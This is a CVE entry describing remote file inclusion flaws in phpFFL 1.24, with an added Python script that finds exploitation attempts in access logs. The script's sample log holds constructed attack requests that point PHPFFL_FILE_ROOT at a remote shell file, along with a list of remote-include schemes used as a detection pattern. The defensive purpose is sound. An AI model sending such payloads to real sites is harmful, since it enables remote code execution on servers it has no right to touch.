CVE-2007-4935 Information
Description
Multiple PHP remote file inclusion vulnerabilities in phpFFL 1.24 allow remote attackers to execute arbitrary PHP code via a URL in the PHPFFL_FILE_ROOT parameter to (1) admin.php, (2) custom_pages.php, (3) draft.php, (4) faq.php, (5) leagues.php, (6) livedraft.php, (7) login.php, (8) my_team.php, (9) profile.php, (10) signup.php, (11) statistics.php, (12) transactions.php, (13) program_files/admin/custom_pages.php, or (14) program_files/common.php. NOTE: the program_files/livedraft/admin.php and program_files/livedraft/livedraft.php vectors are covered by CVE-2007-4934.
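Because the vector is a request parameter whose value is an attacker-supplied URL, exploitation attempts are visible in ordinary web-server access logs. The script below is an added example (not phpFFL code and not taken from any of the references) that scans Common/Combined Log Format lines for requests to the scripts named in the description with a PHPFFL_FILE_ROOT value that points at a remote location, decoding URL-encoded and double-encoded values so that http%3A%2F%2F... is not missed. It also separates the program_files/livedraft/ variants, which the description assigns to CVE-2007-4934, from the fourteen scripts above. The log lines, hostnames and IP addresses are constructed for the example; the log format and the set of "remote" schemes (the URL schemes plus the php:// and data: wrappers) are assumptions, not facts stated on this page.

```python
"""Scan access-log lines for CVE-2007-4935 (phpFFL 1.24 RFI) exploitation attempts.

Added example for this CVE page; not part of phpFFL or of the cited advisories.
Assumes Apache Common/Combined Log Format. All log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts listed in the CVE-2007-4935 description, relative to the phpFFL root.
AFFECTED_SCRIPTS = (
    "admin.php", "custom_pages.php", "draft.php", "faq.php", "leagues.php",
    "livedraft.php", "login.php", "my_team.php", "profile.php", "signup.php",
    "statistics.php", "transactions.php",
    "program_files/admin/custom_pages.php", "program_files/common.php",
)
# Same parameter, but the description assigns these two scripts to CVE-2007-4934.
KNOWN_SCRIPTS = {s: "CVE-2007-4935" for s in AFFECTED_SCRIPTS}
KNOWN_SCRIPTS["program_files/livedraft/admin.php"] = "CVE-2007-4934"
KNOWN_SCRIPTS["program_files/livedraft/livedraft.php"] = "CVE-2007-4934"

# Prefixes that make an include() fetch remote or request-controlled content
# (assumed list; the CVE text only says "a URL").
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Common/Combined Log Format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_remote_include_value(value):
    """True if the (possibly double-encoded) value would make include() go remote."""
    decoded = unquote(unquote(value)).strip().lower()
    return decoded.startswith(REMOTE_PREFIXES)


def match_script(path):
    """Return (script, cve) for the longest known script that ends the path, else None."""
    path = path.lstrip("/")
    best = None
    for script, cve in KNOWN_SCRIPTS.items():
        if path == script or path.endswith("/" + script):
            if best is None or len(script) > len(best[0]):
                best = (script, cve)  # longest suffix wins, so livedraft/admin.php != admin.php
    return best


def classify_request(target):
    """Return {'script', 'cve', 'url'} if the request target carries the RFI payload, else None."""
    parts = urlsplit(target)
    hit = match_script(parts.path)
    if hit is None:
        return None
    script, cve = hit
    # parse_qs decodes one layer of percent-encoding; is_remote_include_value handles a second.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("PHPFFL_FILE_ROOT", []):  # PHP request keys are case-sensitive
        if is_remote_include_value(value):
            return {"script": script, "cve": cve, "url": unquote(value)}
    return None


def scan(lines):
    """Run classify_request over parsed log lines; return one record per suspicious request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        c = classify_request(rec["target"])
        if c is not None:
            hits.append({"ip": rec["ip"], "time": rec["time"], "status": rec["status"], **c})
    return hits


# Constructed sample log (documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Sep/2007:10:21:07 +0000] "GET /phpffl/admin.php?PHPFFL_FILE_ROOT=http://203.0.113.99/shell.txt? HTTP/1.1" 200 512
203.0.113.5 - - [14/Sep/2007:10:21:09 +0000] "GET /phpffl/program_files/common.php?PHPFFL_FILE_ROOT=http%3A%2F%2F203.0.113.99%2Fs.txt HTTP/1.1" 200 512
203.0.113.5 - - [14/Sep/2007:10:21:11 +0000] "GET /phpffl/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://203.0.113.99/s.txt HTTP/1.1" 200 512
198.51.100.7 - - [14/Sep/2007:10:22:00 +0000] "GET /phpffl/login.php?PHPFFL_FILE_ROOT=/var/www/phpffl HTTP/1.1" 200 3120
198.51.100.7 - - [14/Sep/2007:10:22:05 +0000] "GET /phpffl/faq.php HTTP/1.1" 200 2048
this line is not in log format and is skipped
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(f'{h["time"]} {h["ip"]} {h["cve"]} {h["script"]} <- {h["url"]} (HTTP {h["status"]})')
```

Only the first three sample lines are reported: the local-path value on login.php is not a remote include and the faq.php request carries no parameter at all. A 200 status on a hit does not by itself prove the include succeeded (allow_url_include / allow_url_fopen may be off), so treat hits as triage input rather than confirmed compromise.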
Reference
http://arfis.wordpress.com/2007/09/14/rfi-02-phpffl-fantasy-football-league-manager/
http://osvdb.org/39650
http://osvdb.org/39651
http://osvdb.org/39652
http://osvdb.org/39653
http://osvdb.org/39654
http://osvdb.org/39655
http://osvdb.org/39656
http://osvdb.org/39657
http://osvdb.org/39658
http://osvdb.org/39659
http://osvdb.org/39660
http://secunia.com/advisories/26812
http://sourceforge.net/forum/forum.php?forum_id=735906
http://sourceforge.net/project/shownotes.php?release_id=539716&group_id=137531
http://www.vupen.com/english/advisories/2007/3176